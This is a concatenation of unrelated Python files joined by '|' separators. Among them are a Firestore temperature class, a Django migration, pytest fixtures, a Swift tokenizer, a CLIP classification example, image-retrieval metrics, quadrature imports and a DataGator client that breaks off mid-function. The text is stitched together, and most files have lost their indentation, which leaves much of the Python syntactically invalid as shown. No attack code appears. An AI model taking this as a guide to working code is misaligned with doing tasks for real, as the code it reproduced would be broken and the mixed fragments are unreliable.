'remote': 'remote2',
'items': [{'packages': []}]
}
]
results = Results(json)
self.assertListEqual(sorted(results.settings), sorted(['os.api', 'os', 'compiler']))
self.assertListEqual(results.options, ['opt.key1'])
self.assertEqual(results.requires, True)
self.assertListEqual(sorted(results.remotes), sorted(['remote1', 'remote2']))
|
# -*- coding: utf-8 -*-
__author__ = 'zj'
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
x = np.linspace(0, 20, 100) # Create a list of evenly-spaced numbers over the range
plt.plot(x, np.sin(x)) # Plot the sine of each x point
plt.show() # Display the plot
|
import os
import configparser
import platform
config = configparser.ConfigParser()
config.read('./config.ini')
location = config.get('MODE', 'LOCATION')
print ("[temperature_firestore] location", location)
if location == "local":
platform = platform.system()
print("[temperature_firestore] platform: ", platform)
if platform == "Windows":
credential_path = config.get('GOOGLE_APPLICATION_CREDENTIALS_FILE', 'WINDOWS')
credential_path = credential_path.strip('\"')
print("[temperature_firestore] windows")
elif platform == "Linux":
credential_path = config.get('GOOGLE_APPLICATION_CREDENTIALS_FILE', 'LINUX')
        # credential_path = credential_path.strip('\"')  # TODO: not verified on Linux yet; the strip is required on Windows
print("[temperature_firestore] linux")
print("[temperature_firestore] credential_path: ", credential_path)
# Project ID is determined by the GCLOUD_PROJECT environment variable
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credential_path
from google.cloud import firestore
class TempVal():
# This is set for temperatures
_targetT: int
_weatherT: int
_roomT: int
_comfortT: int
_economT: int
_waterT: int
_serversStatus: str
apartment = u'test-apartment-135'
db = None
def __init__(self):
self.db = firestore.Client()
        doc_ref = self.db.collection(u'smarthome').document(self.apartment)  # self.apartment refers to the test-only document defined above
doc = doc_ref.get()
if doc.exists:
print(f'[temperature_firestore] Document data: {doc.to_dict()}', self.apartment)
else:
print(u'No such apartment:', self.apartment)
doc_ref.set({
'targetT': 21,
'weatherT': 12,
'roomT': 23,
'comfortT': 24,
'economT': 14,
'waterT': 35,
})
doc_ref = self.db.collection(u'smarthome').document(self.apartment)
def fs_ref(self):
return self.db.collection(u'smarthome').document(self.apartment)
######################################
@property
def targetT(self):
self._targetT = self.fs_ref().get().to_dict()['targetT']
return self._targetT
@targetT.setter
def targetT(self, val):
self._targetT = val
self.fs_ref().set({'targetT': val}, merge=True)
######################################
######################################
@property
def roomT(self):
self._roomT = self.fs_ref().get().to_dict()['roomT']
return self._roomT
@roomT.setter
def roomT(self, val):
self._roomT = val
self.fs_ref().set({'roomT': val}, merge=True)
######################################
@property
def comfortT(self):
self._comfortT = self.fs_ref().get().to_dict()['comfortT']
return self._comfortT
@comfortT.setter
def comfortT(self, val):
self._comfortT = val
self.fs_ref().set({'comfortT': val}, merge=True)
######################################
@property
def economT(self):
self._economT = self.fs_ref().get().to_dict()['economT']
return self._economT
@economT.setter
def economT(self, val):
self._economT = val
self.fs_ref().set({'economT': val}, merge=True)
######################################
@property
def waterT(self):
self._waterT = self.fs_ref().get().to_dict()['waterT']
return self._waterT
@waterT.setter
def waterT(self, val):
self._waterT = val
self.fs_ref().set({'waterT': val}, merge=True)
######################################
@property
def serversStatus(self):
self._serversStatus = self.fs_ref().get().to_dict()['serversStatus']
return self._serversStatus
@serversStatus.setter
def serversStatus(self, val):
self._serversStatus = val
self.fs_ref().set({'serversStatus': val}, merge=True)
######################################
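# Usage sketch (not part of the original module; requires the Google credentials
# configured above and network access to Firestore):
if __name__ == '__main__':
    temps = TempVal()
    temps.targetT = 22    # writes {'targetT': 22} to the apartment document
    print('[temperature_firestore] targetT:', temps.targetT)    # reads it back from Firestore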
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-03-11 11:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Activities', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='activities',
name='status',
field=models.CharField(choices=[('in_progress', 'in_progress'), ('finished', 'finished')], max_length=255),
),
]
|
name = 'gsodpy'
|
#############################################################################
#
# VFRAME
# MIT License
# Copyright (c) 2020 Adam Harvey and VFRAME
# https://vframe.io
#
#############################################################################
import click
from vframe.settings.app_cfg import VALID_PIPE_MEDIA_EXTS
from vframe.utils.click_utils import generator
@click.command('')
@click.option('-i', '--input', 'opt_input', required=True,
help='Path to image or directory')
@click.option('-e', '--exts', 'opt_exts', default=VALID_PIPE_MEDIA_EXTS,
multiple=True, help='Extensions to glob for')
@click.option('-r', '--recursive', 'opt_recursive', is_flag=True,
help='Recursive glob')
@click.option('--slice', 'opt_slice', type=(int, int), default=(-1, -1),
help="Slice list of inputs")
@click.option('--skip-frames', 'opt_skip_frames', is_flag=True,
help='Skip all frames, only iterate files')
@generator
@click.pass_context
def cli(ctx, sink, opt_input, opt_recursive, opt_exts, opt_slice, opt_skip_frames):
"""Open media for processing"""
from tqdm import tqdm
import dacite
from vframe.settings.app_cfg import LOG, SKIP_FRAME, READER, SKIP_FILE
from vframe.settings.app_cfg import USE_PREHASH, USE_DRAW_FRAME
from vframe.settings.app_cfg import MEDIA_FILTERS, SKIP_MEDIA_FILTERS
from vframe.models.media import MediaFileReader
from vframe.utils.sys_utils import SignalInterrupt
from vframe.utils.file_utils import get_ext
# ---------------------------------------------------------------------------
# init
sigint = SignalInterrupt()
init_obj = {
'filepath': opt_input,
'exts': tuple(opt_exts),
'slice_idxs': opt_slice,
'recursive': opt_recursive,
'use_prehash': ctx.obj.get(USE_PREHASH, False),
'use_draw_frame': ctx.obj.get(USE_DRAW_FRAME, False),
'media_filters': ctx.obj.get(MEDIA_FILTERS, []),
'skip_all_frames': opt_skip_frames
}
# init media file reader
r = dacite.from_dict(data_class=MediaFileReader, data=init_obj)
ctx.obj[READER] = r
ctx.obj[SKIP_MEDIA_FILTERS] = get_ext(opt_input) == 'json'
# error checks
if not r.n_files:
LOG.info('No files to process.')
return
# process media
for m in tqdm(r.iter_files(), total=r.n_files, desc='Files', leave=False):
ctx.obj[SKIP_FILE] = False # reset
m.skip_all_frames = opt_skip_frames
if sigint.interrupted:
m.unload()
return
for ok in tqdm(m.iter_frames(), total=m.n_frames, desc=m.fn, disable=m.n_frames <= 1, leave=False):
ctx.opts[SKIP_FRAME] = opt_skip_frames
if ctx.obj.get(SKIP_FILE, False):
m.skip_file()
# if not m.frame_count > 0:
# continue
# check for ctl-c, exit gracefully
if sigint.interrupted:
m.unload()
return
# init frame-iter presets
sink.send(m)
# print stats
LOG.info(r.stats)
|
import pytest
@pytest.yield_fixture(scope="module")
def test_domain_project(test_admin_client):
domain = test_admin_client.Domain()
domain.slug = "test-project"
domain.name = "Test Domain"
domain.description = "Test" * 10
domain.save()
yield domain
domain.destroy()
@pytest.yield_fixture(scope="module")
def test_domain(test_admin_client):
domain = test_admin_client.Domain()
domain.slug = "test"
domain.name = "Test Domain"
domain.description = "Test" * 10
domain.save()
yield domain
domain.destroy()
@pytest.yield_fixture(scope="module")
def test_project(test_admin_client, test_domain):
project = test_admin_client.Project()
project.slug = "test"
project.name = "Test"
project.description = project.name * 10
project.domain_id = test_domain.id
project.save()
yield project
project.destroy()
|
# BuildFox deploy script
# compiles multiple files into one python script
import re
from pprint import pprint
re_lib_import = re.compile(r"^from (lib_\w+) import \w+((, \w+)+)?$", flags = re.MULTILINE)
re_import = re.compile(r"^import (\w+)$", flags = re.MULTILINE)
# return prepared text of BuildFox module
def file_text(name):
with open(name, "r") as f:
text = f.read()
text = text.replace("#!/usr/bin/env python", "")
text = text.replace("# BuildFox ninja generator", "")
return text
# return license text
def license_text():
text = open("../license", "r").readlines()
text = ["# " + line if len(line) > 1 else "#\n" for line in text] # don't add space in empty lines
text = "".join(text) + "\n"
return text
# replace BuildFox imports
replaced = False
visited_files = set()
def replace_lib_import(matchobj):
global replaced, visited_files
name = matchobj.group(1)
if name not in visited_files:
visited_files.add(name)
replaced = True
return "%s" % file_text("../%s.py" % name)
else:
return ""
# put all BuildFox imports in one file
text = file_text("../buildfox.py")
replaced = True
while replaced:
replaced = False
text = re_lib_import.sub(replace_lib_import, text)
# place system imports on top
system_imports = set()
def replace_import(matchobj):
global system_imports
system_imports.add(matchobj.group(1))
return ""
text = re_import.sub(replace_import, text)
system_imports = sorted(list(system_imports), key = lambda v: len(v))
# beautify whitespace
text = re.sub("\n\n+", "\n\n", text) # strip more then two new lines in a row
text = text.strip() # strip start and end whitespace
text += "\n" # ensure new line in the end
# figure out version
ver_major = re.search("^MAJOR = (\d+)$", text, flags = re.MULTILINE)
ver_minor = re.search("^MINOR = (\d+)$", text, flags = re.MULTILINE)
if ver_major and ver_minor:
ver = "v%d.%d" % (int(ver_major.group(1)), int(ver_minor.group(1)))
else:
ver = "version unknown"
print("BuildFox %s" % ver)
# write compiled version
with open("__init__.py", "w") as f:
f.write("#!/usr/bin/env python\n\n")
f.write("# BuildFox ninja generator, %s\n\n" % ver)
f.write(license_text())
f.write("\n")
for imp in system_imports:
f.write("import %s\n" % imp)
f.write("\n")
f.write(text)
|
import os
class LocustfileStorage:
def upload(self, locustfile: os.PathLike) -> None:
raise NotImplementedError()
def delete(self) -> None:
raise NotImplementedError()
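# A minimal, hedged sketch of a concrete backend that just copies the
# locustfile into a local directory; the file layout chosen here is an
# assumption, not part of the original interface.
import shutil

class LocalLocustfileStorage(LocustfileStorage):
    def __init__(self, target_dir: os.PathLike) -> None:
        self._target = os.path.join(os.fspath(target_dir), "locustfile.py")

    def upload(self, locustfile: os.PathLike) -> None:
        # Copy the given locustfile to the fixed target path.
        shutil.copyfile(os.fspath(locustfile), self._target)

    def delete(self) -> None:
        # Remove the uploaded file if present; deleting twice is a no-op.
        if os.path.exists(self._target):
            os.remove(self._target)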
|
"""Tensorflow based linear algebra backend."""
import tensorflow as tf
# "Forward-import" primitives. Due to the way the 'linalg' module is exported
# in TF, this does not work with 'from tensorflow.linalg import ...'.
det = tf.linalg.det
eigh = tf.linalg.eigh
eigvalsh = tf.linalg.eigvalsh
expm = tf.linalg.expm
inv = tf.linalg.inv
sqrtm = tf.linalg.sqrtm
diagonal = tf.linalg.diag_part
def norm(x, dtype=tf.float32, **kwargs):
x = tf.cast(x, dtype)
return tf.linalg.norm(x, **kwargs)
def eig(*args, **kwargs):
raise NotImplementedError
def logm(x):
original_type = x.dtype
x = tf.cast(x, tf.complex64)
tf_logm = tf.linalg.logm(x)
tf_logm = tf.cast(tf_logm, original_type)
return tf_logm
def svd(x):
s, u, v_t = tf.linalg.svd(x, full_matrices=True)
return u, s, tf.transpose(v_t, perm=(0, 2, 1))
def qr(*args, mode='reduced'):
def qr_aux(x, mode):
if mode == 'complete':
aux = tf.linalg.qr(x, full_matrices=True)
else:
aux = tf.linalg.qr(x)
return aux.q, aux.r
result = tf.map_fn(
lambda x: qr_aux(x, mode),
*args,
dtype=(tf.float32, tf.float32))
return result
def powerm(x, power):
return expm(power * logm(x))
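# A minimal, hedged sanity check (assumes TensorFlow 2.x eager execution):
# for a symmetric positive-definite matrix, powerm(x, 2) should roughly
# reproduce the plain matrix product x @ x.
if __name__ == "__main__":
    x = tf.constant([[2.0, 0.5], [0.5, 1.0]])
    print(powerm(x, 2.0).numpy())
    print(tf.matmul(x, x).numpy())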
|
import org.pydev.dhyaniv.stockAnalyzer.getandAnalyzeStockData as stockAnalyzer
import org.pydev.dhyaniv.constants.constants as constants
import time
import schedule
if __name__ == "__main__":
print("Hello guys!")
#schedule.every(20).seconds.do(stockAnalyzer.getStockData)
#schedule.every(constants.CHECKFREQUENCY).seconds.do(stockAnalyzer.getStockData)
#schedule.every(constants.CHECKFREQUENCY).seconds.do(stockAnalyzer.getStalkedStocksData)
schedule.every(constants.CHECKFREQUENCY).seconds.do(stockAnalyzer.getSellNotificationData)
while True:
# Checks whether a scheduled task
# is pending to run or not
schedule.run_pending()
time.sleep(1)
|
from django.conf.urls import include, url
from rest_framework import routers
from talos import views
from django.contrib import admin
router = routers.DefaultRouter()
router.register(r'projects', views.ProjectViewSet)
router.register(r'libraries', views.LibraryFileViewSet)
router.register(r'resource_files', views.ResourceFileViewSet)
router.register(r'keywords', views.KeywordViewSet)
router.register(r'testcases', views.TestcaseViewSet)
router.register(r'suitefiles', views.SuiteFileViewSet)
urlpatterns = [
url(r'^api/', include(router.urls)),
url(r'^admin/', include(admin.site.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
]
|
import string
import math
from codestat_tokenizer import Tokenizer
from token_builders import (
InvalidTokenBuilder,
WhitespaceTokenBuilder,
NewlineTokenBuilder,
EscapedStringTokenBuilder,
IntegerTokenBuilder,
IntegerExponentTokenBuilder,
RealTokenBuilder,
RealExponentTokenBuilder,
PrefixedIntegerTokenBuilder,
SuffixedIdentifierTokenBuilder,
CaseInsensitiveListTokenBuilder,
CaseSensitiveListTokenBuilder,
SingleCharacterTokenBuilder,
PrefixedIdentifierTokenBuilder,
TripleQuoteStringTokenBuilder
)
from cx_token_builders import (
SlashSlashCommentTokenBuilder,
SlashStarCommentTokenBuilder
)
from swift_token_builders import (
SwiftArgumentTokenBuilder,
SwiftSymbolTokenBuilder
)
from examiner import Examiner
class SwiftExaminer(Examiner):
@staticmethod
def __escape_z__():
InvalidTokenBuilder.__escape_z__()
WhitespaceTokenBuilder.__escape_z__()
NewlineTokenBuilder.__escape_z__()
EscapedStringTokenBuilder.__escape_z__()
IntegerTokenBuilder.__escape_z__()
IntegerExponentTokenBuilder.__escape_z__()
RealTokenBuilder.__escape_z__()
RealExponentTokenBuilder.__escape_z__()
PrefixedIntegerTokenBuilder.__escape_z__()
SuffixedIdentifierTokenBuilder.__escape_z__()
CaseInsensitiveListTokenBuilder.__escape_z__()
CaseSensitiveListTokenBuilder.__escape_z__()
SingleCharacterTokenBuilder.__escape_z__()
PrefixedIdentifierTokenBuilder.__escape_z__()
TripleQuoteStringTokenBuilder.__escape_z__()
SlashSlashCommentTokenBuilder.__escape_z__()
SlashStarCommentTokenBuilder.__escape_z__()
SwiftArgumentTokenBuilder.__escape_z__()
SwiftSymbolTokenBuilder.__escape_z__()
return 'Escape ?Z'
def __init__(self, code):
super().__init__()
operand_types = []
whitespace_tb = WhitespaceTokenBuilder()
newline_tb = NewlineTokenBuilder()
stmt_separator_tb = SingleCharacterTokenBuilder(';', 'statement separator', False)
integer_tb = IntegerTokenBuilder('_')
integer_exponent_tb = IntegerExponentTokenBuilder('_')
real_tb = RealTokenBuilder(True, True, '_')
real_exponent_tb = RealExponentTokenBuilder(True, True, 'E', '_')
operand_types.append('number')
argument_tb = SwiftArgumentTokenBuilder()
leads = '_'
extras = '_'
suffixes = '?'
identifier_tb = SuffixedIdentifierTokenBuilder(leads, extras, suffixes)
operand_types.append('identifier')
attribute_tb = PrefixedIdentifierTokenBuilder('@', 'attribute', False)
symbol_tb = SwiftSymbolTokenBuilder('.', 'symbol', True)
operand_types.append('symbol')
quotes = ['"', "'", "’"]
string_tb = EscapedStringTokenBuilder(quotes, 10)
triple_quote_comment_tb = TripleQuoteStringTokenBuilder(quotes)
slash_slash_comment_tb = SlashSlashCommentTokenBuilder()
slash_star_comment_tb = SlashStarCommentTokenBuilder()
operand_types.append('string')
known_operators = [
'+', '-', '*', '/', '%',
'==', '!=', '>', '<', '>=', '<=',
'&&', '||', '!', '&', '|', '^',
'~', '<<', '>>', '===',
'=', '+=', '-=', '*=', '/=', '%=', '<<=', '>>=', '&=', '^=', '|=',
'...', '..<', '?', ':',
'.', '++', '--',
'->', '??', '\\.',
'&+', '&-', '&*'
]
known_operator_tb = CaseSensitiveListTokenBuilder(known_operators, 'operator', False)
self.unary_operators = [
'+', '-',
'!', '~', '&',
'++', '--', ':', '?'
]
self.postfix_operators = [
'++', '--', ':', '!', '?'
]
groupers = ['(', ')', ',', '[', ']', '{', '}']
group_starts = ['(', '[', ',', '{']
group_mids = [',']
group_ends = [')', ']', '}']
groupers_tb = CaseInsensitiveListTokenBuilder(groupers, 'group', False)
keywords = [
'associatedtype', 'class', 'deinit', 'enum', 'extension', 'fileprivate',
'func', 'import', 'init', 'inout', 'internal', 'let', 'open', 'operator',
'private', 'protocol', 'public', 'static', 'struct', 'subscript',
'typealias', 'var',
'break', 'case', 'continue', 'default', 'defer', 'do', 'else', 'fallthrough',
'for', 'guard', 'if', 'in', 'repeat', 'return', 'switch', 'where', 'while',
'as', 'Any', 'catch', 'is', 'rethrows', 'super',
'throw', 'throws', 'try', 'try?', 'try!',
'#available', '#colorLiteral', '#column', '#else', '#elseif', '#endif',
'#file', '#fileLiteral', '#function', '#if', '#imageLiteral', '#line',
'#selector', '#sourceLocation',
'associativity', 'convenience', 'dynamic', 'didSet', 'final', 'get',
'infix', 'indirect', 'lazy', 'left', 'mutating', 'none', 'nonmutating',
'optional', 'override', 'postfix', 'precedence', 'prefix', 'Protocol',
'required', 'right', 'set', 'Type', 'unowned', 'weak', 'willSet'
]
keyword_tb = CaseSensitiveListTokenBuilder(keywords, 'keyword', False)
types = [
'char', 'double', 'float', 'int',
'long', 'short',
]
types_tb = CaseSensitiveListTokenBuilder(types, 'type', True)
operand_types.append('type')
values = [
'nil', 'Self', 'false', 'true'
]
values_tb = CaseSensitiveListTokenBuilder(values, 'value', True)
operand_types.append('value')
invalid_token_builder = InvalidTokenBuilder()
tokenbuilders = [
newline_tb,
whitespace_tb,
stmt_separator_tb,
integer_tb,
integer_exponent_tb,
real_tb,
real_exponent_tb,
argument_tb,
keyword_tb,
types_tb,
values_tb,
known_operator_tb,
groupers_tb,
identifier_tb,
attribute_tb,
symbol_tb,
string_tb,
slash_slash_comment_tb,
slash_star_comment_tb,
triple_quote_comment_tb,
self.unknown_operator_tb,
invalid_token_builder
]
tokenizer = Tokenizer(tokenbuilders)
tokens = tokenizer.tokenize(code)
tokens = Examiner.combine_adjacent_identical_tokens(tokens, 'invalid operator')
self.tokens = Examiner.combine_adjacent_identical_tokens(tokens, 'invalid')
self.convert_keywords_to_identifiers(['.'])
self.calc_statistics()
tokens = self.source_tokens()
tokens = Examiner.join_all_lines(tokens)
self.calc_token_confidence()
self.calc_token_2_confidence()
num_operators = self.count_my_tokens(['operator', 'invalid operator'])
if num_operators > 0:
self.calc_operator_confidence(num_operators)
allow_pairs = []
self.calc_operator_2_confidence(tokens, num_operators, allow_pairs)
self.calc_operator_3_confidence(tokens, num_operators, group_ends, allow_pairs)
self.calc_operator_4_confidence(tokens, num_operators, group_starts, allow_pairs)
self.calc_group_confidence(tokens, group_mids)
operand_types = ['number', 'string', 'symbol']
self.calc_operand_n_confidence(tokens, operand_types, 2)
self.calc_operand_n_confidence(tokens, operand_types, 4)
self.calc_keyword_confidence()
self.calc_line_length_confidence(code, self.max_expected_line)
|
import os
import clip
import torch
import numpy as np
from sklearn.linear_model import LogisticRegression
from torch.utils.data import DataLoader
from torchvision.datasets import CIFAR100
from tqdm import tqdm
# Load the model
device = "cuda" if torch.cuda.is_available() else "cpu"
model, preprocess = clip.load('ViT-B/32', device)
# Load the dataset
root = os.path.expanduser("~/.cache")
train = CIFAR100(root, download=True, train=True, transform=preprocess)
test = CIFAR100(root, download=True, train=False, transform=preprocess)
def get_features(dataset):
all_features = []
all_labels = []
with torch.no_grad():
for images, labels in tqdm(DataLoader(dataset, batch_size=100)):
features = model.encode_image(images.to(device))
all_features.append(features)
all_labels.append(labels)
return torch.cat(all_features).cpu().numpy(), torch.cat(all_labels).cpu().numpy()
# Calculate the image features
train_features, train_labels = get_features(train)
test_features, test_labels = get_features(test)
# Perform logistic regression
classifier = LogisticRegression(random_state=0, C=0.316, max_iter=1000, verbose=1)
classifier.fit(train_features, train_labels)
# Evaluate using the logistic regression classifier
predictions = classifier.predict(test_features)
accuracy = np.mean((test_labels == predictions).astype(float)) * 100.
print(f"Accuracy = {accuracy:.3f}")
|
# mAP and topk recall rate for image retrieval
import numpy as np
import torch
from torch.autograd import Variable
import pdb
def main():
x_query = Variable(torch.rand(3,100))
x_gallery = Variable(torch.rand(9,100))
y_query = Variable(torch.LongTensor([0,1,2]))
y_gallery = Variable(torch.LongTensor([0,0,1,1,1,1,2,2,2]))
test=ImageRetrieval()
result1=test(x_query,x_gallery,y_query,y_gallery)
result2=test.getby_numpy(x_query.data.numpy(),x_gallery.data.numpy(),
y_query.data.numpy(),y_gallery.data.numpy())
print('p={},r={}'.format(result1[0],result1[1]))
print('p={},r={}'.format(result2[0],result2[1]))
class ImageRetrieval:
def __init__(self, topk=10, cuda=False):
self.topk = topk
self.cuda = cuda
def normalize(self, x, tool, axis=None, epsilon=10e-12):
'''Divide the vectors in x by their norms.'''
if axis is None:
axis = len(x.shape) - 1
if tool == 'numpy':
norm = np.linalg.norm(x, axis=axis, keepdims=True)
elif tool == 'torch':
norm = torch.mul(x,x).sum(dim=axis, keepdim=True).sqrt()
x = x / (norm + epsilon)
return x
def __call__(self, x_query, x_gallery, y_query, y_gallery):
x_query = self.normalize(x_query, 'torch')
x_gallery = self.normalize(x_gallery, 'torch')
score_mat = torch.mm(x_query, x_gallery.transpose(1,0))
temp1 = torch.eye(x_query.size(0))
temp2 = torch.ones(x_query.size(0))
score_mask = temp2 - temp1
if self.cuda:
score_mask = score_mask.cuda()
if x_query.size(0) == x_gallery.size(0):
score_mat = torch.mul(score_mask, score_mat)
# compute label matrix
y_query = y_query[:,None]
y_gallery = y_gallery[:,None]
label_mat = y_query==y_gallery.transpose(1,0)
label_mat=label_mat.type(torch.FloatTensor)
# sort scores and labels
_,idx_sorted = torch.sort(-score_mat, dim=1)
tmp_list = [(label_mat[x, idx_sorted[x]])[None,:] for x in range(label_mat.shape[0])]
label_sorted = torch.zeros(label_mat.size())
torch.cat(tmp_list, out=label_sorted)
if self.cuda:
label_sorted = label_sorted.cuda()
if x_query.size(0) == x_gallery.size(0):
label_sorted = torch.mul(score_mask, label_sorted)
label_sorted = Variable(label_sorted, requires_grad=False)
# check the number of matching images
num_positive = torch.sum(label_sorted, dim=1)
idx = num_positive.nonzero()
# compute precision of top positives
if idx.numel() != 0:
precision = torch.zeros(idx.size(0))
precision = Variable(precision, requires_grad=False)
if self.cuda:
precision = precision.cuda()
for i,j in enumerate(idx):
num = float(num_positive[j])
temp = label_sorted[j].nonzero()
den = float(temp[-1][-1])
if den+1 == 0:
pdb.set_trace()
precision[i] = num/(den+1)
precision = torch.mean(precision).item()
else:
precision = 0.0
# compute top k recall
if idx.numel() != 0:
if label_sorted.size(-1) < self.topk:
topk = label_sorted.size(-1)
else:
topk = self.topk
total = torch.sum(label_sorted[idx,:topk].view(-1,topk), dim=1)
num = float(total.nonzero().size(0))
den = float(idx.size(0))
recall = num/den
else:
recall = 0.0
return precision,recall
def getby_numpy(self, x_query, x_gallery, y_query, y_gallery):
x_query = self.normalize(x_query,'numpy')
x_gallery = self.normalize(x_gallery,'numpy')
score_mat = np.dot(x_query,x_gallery.T)
# compute label matrix
y_query = y_query[:,None]
y_gallery = y_gallery[:,None]
label_mat = y_query==y_gallery.T
idx_sorted = np.argsort(-score_mat, axis=1)
label_sorted = [label_mat[x, idx_sorted[x]] for x in range(label_mat.shape[0])]
label_sorted = np.array(label_sorted)
label_sorted = label_sorted.astype(float)
# check the number of matching images
num_positive = np.sum(label_sorted, axis=1)
idx = num_positive.nonzero()
# compute precision of top positives
if len(idx[0]) != 0:
precision = np.zeros((len(idx[0])))
for i,j in enumerate(idx[0]):
num = float(num_positive[j])
temp = label_sorted[j].nonzero()
den = float(temp[0][-1])
precision[i] = num/(den+1)
precision = float(np.mean(precision))
else:
precision = 0.0
# compute top k recall
if len(idx[0]) != 0:
total = np.sum(label_sorted[idx,:self.topk].reshape(-1,self.topk), axis=1)
num = float(len(total.nonzero()[0]))
den = float(len(idx[0]))
recall = num/den
else:
recall = 0.0
return precision,recall
|
r"""Collection of quadrature methods."""
import logging
from functools import wraps
from .frontend import generate_quadrature
from .sparse_grid import sparse_grid
from .utils import combine
from .chebyshev import chebyshev_1, chebyshev_2
from .clenshaw_curtis import clenshaw_curtis
from .discrete import discrete
from .fejer_1 import fejer_1
from .fejer_2 import fejer_2
from .gaussian import gaussian
from .genz_keister import (
genz_keister_16, genz_keister_18, genz_keister_22, genz_keister_24)
from .gegenbauer import gegenbauer
from .grid import grid
from .hermite import hermite
from .jacobi import jacobi
from .kronrod import kronrod, kronrod_jacobi
from .laguerre import laguerre
from .legendre import legendre, legendre_proxy
from .leja import leja
from .lobatto import lobatto
from .newton_cotes import newton_cotes
from .patterson import patterson
from .radau import radau
__all__ = ["generate_quadrature", "sparse_grid", "combine"]
INTEGRATION_COLLECTION = {
"clenshaw_curtis": clenshaw_curtis,
"discrete": discrete,
"fejer_1": fejer_1,
"fejer_2": fejer_2,
"gaussian": gaussian,
"genz_keister_16": genz_keister_16,
"genz_keister_18": genz_keister_18,
"genz_keister_22": genz_keister_22,
"genz_keister_24": genz_keister_24,
"grid": grid,
"kronrod": kronrod,
"legendre": legendre_proxy,
"leja": leja,
"lobatto": lobatto,
"newton_cotes": newton_cotes,
"patterson": patterson,
"radau": radau,
}
def quadrature_deprecation_warning(name, func):
"""Announce deprecation warning for quad-func."""
quad_name = "quad_%s" % name
@wraps(func)
def wrapped(*args, **kwargs):
"""Function wrapper adds warnings."""
logger = logging.getLogger(__name__)
logger.warning("chaospy.%s name is to be deprecated; "
"Use chaospy.quadrature.%s instead",
quad_name, func.__name__)
return func(*args, **kwargs)
globals()[quad_name] = wrapped
__all__.append(quad_name)
quadrature_deprecation_warning("clenshaw_curtis", clenshaw_curtis)
quadrature_deprecation_warning("discrete", discrete)
quadrature_deprecation_warning("fejer", fejer_2)
quadrature_deprecation_warning("grid", grid)
quadrature_deprecation_warning("gaussian", gaussian)
quadrature_deprecation_warning("newton_cotes", newton_cotes)
quadrature_deprecation_warning("leja", leja)
quadrature_deprecation_warning("gauss_legendre", legendre_proxy)
quadrature_deprecation_warning("gauss_kronrod", kronrod)
quadrature_deprecation_warning("gauss_lobatto", lobatto)
quadrature_deprecation_warning("gauss_patterson", patterson)
quadrature_deprecation_warning("gauss_radau", radau)
quadrature_deprecation_warning("genz_keister", genz_keister_24)
|
from abc import ABC, abstractmethod
from datetime import date
from listens.definitions import SunlightWindow
class SunlightGateway(ABC):
@abstractmethod
def fetch_sunlight_window(self, iana_timezone: str, on_date: date) -> SunlightWindow:
...
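# A minimal, hedged sketch of a concrete gateway for tests: it ignores the
# timezone and date and always returns a canned SunlightWindow supplied by
# the caller, so no assumptions are made about SunlightWindow's fields.
class FixedSunlightGateway(SunlightGateway):
    def __init__(self, window: SunlightWindow) -> None:
        self._window = window

    def fetch_sunlight_window(self, iana_timezone: str, on_date: date) -> SunlightWindow:
        return self._window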
|
# -*- coding: utf-8 -*-
"""
datagator.api.client._entity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2015 by `University of Denver <http://pardee.du.edu/>`_
:license: Apache 2.0, see LICENSE for more details.
:author: `LIU Yu <liuyu@opencps.net>`_
:date: 2015/03/24
"""
from __future__ import unicode_literals, with_statement
import abc
import atexit
import importlib
import io
import itertools
import json
import jsonschema
import logging
import os
import re
import tempfile
from . import environ
from ._backend import DataGatorService
from ._cache import CacheManager
from ._compat import OrderedDict, with_metaclass
from ._compat import to_bytes, to_native, to_unicode
__all__ = ['Entity', 'validated', 'normalized', ]
__all__ = [to_native(n) for n in __all__]
_log = logging.getLogger(__name__)
def normalized(kind):
"""
Normalized entity kind without leading "datagator#"
"""
kind = to_unicode(kind or "")
if kind.startswith("datagator#"):
kind = kind[len("datagator#"):]
return kind or None
class validated(object):
"""
Context manager and proxy to validated response from backend service
"""
DEFAULT_CHUNK_SIZE = 2 ** 21 # 2MB
__slots__ = ['__response', '__expected_status', '__raw_body',
'__decoded_body', '__size', ]
def __init__(self, response, verify_status=True):
"""
:param response: response object from the backend service
:param verify_status: expected status codes: a `list` or `tuple` of codes, `True` for (200, ) only, or a falsy value to skip status verification
"""
assert(environ.DATAGATOR_API_VERSION == "v2"), \
"incompatible backend service version"
self.__response = response
self.__expected_status = tuple(verify_status) \
if isinstance(verify_status, (list, tuple)) else (200, ) \
if verify_status else None
self.__raw_body = None
self.__decoded_body = None
self.__size = 0
pass
@property
def status_code(self):
"""
HTTP status code of the underlying response
"""
return self.__response.status_code
@property
def headers(self):
"""
HTTP message headers of the underlying response
"""
return self.__response.headers
@property
def links(self):
"""
HTTP Link headers parsed as a dictionary
"""
if "Link" not in self.headers:
return dict()
regex = r"""<([^\>]*)>;\s*rel="(\w+)"\s*"""
return dict([(k, v) for v, k in re.findall(
regex, self.headers['Link'])])
@property
def body(self):
"""
HTTP message body stored as a file-like object
"""
if self.__raw_body is not None:
self.__raw_body.seek(0)
return self.__raw_body
def json(self, validate_schema=True):
"""
JSON-decoded message body of the underlying response
"""
if self.__decoded_body is None:
try:
# py3k cannot `json.load()` binary files directly, it needs a
# text IO wrapper to handle decoding (to unicode / str)
data = json.load(io.TextIOWrapper(self.body))
if validate_schema:
Entity.schema.validate(data)
except (jsonschema.ValidationError, AssertionError, IOError, ):
raise RuntimeError("invalid response from backend service")
else:
self.__decoded_body = data
return self.__decoded_body
def __len__(self):
return self.__size
def __enter__(self):
# validate content-type and body data
_log.debug("validating response")
_log.debug(" - from: {0}".format(self.__response.url))
_log.debug(" - status code: {0}".format(self.__response.status_code))
_log.debug(" - response time: {0}".format(self.__response.elapsed))
try:
# response body should be a valid JSON object
assert(self.headers['Content-Type'] == "application/json")
f = tempfile.SpooledTemporaryFile(
max_size=self.DEFAULT_CHUNK_SIZE, mode="w+b",
suffix=".DataGatorEntity")
# make sure f conforms to the prototype of `io.IOBase`
for attr in ("readable", "writable", "seekable"):
if not hasattr(f, attr):
setattr(f, attr, lambda: True)
# write decoded response body
for chunk in self.__response.iter_content(
chunk_size=self.DEFAULT_CHUNK_SIZE,
decode_unicode=True):
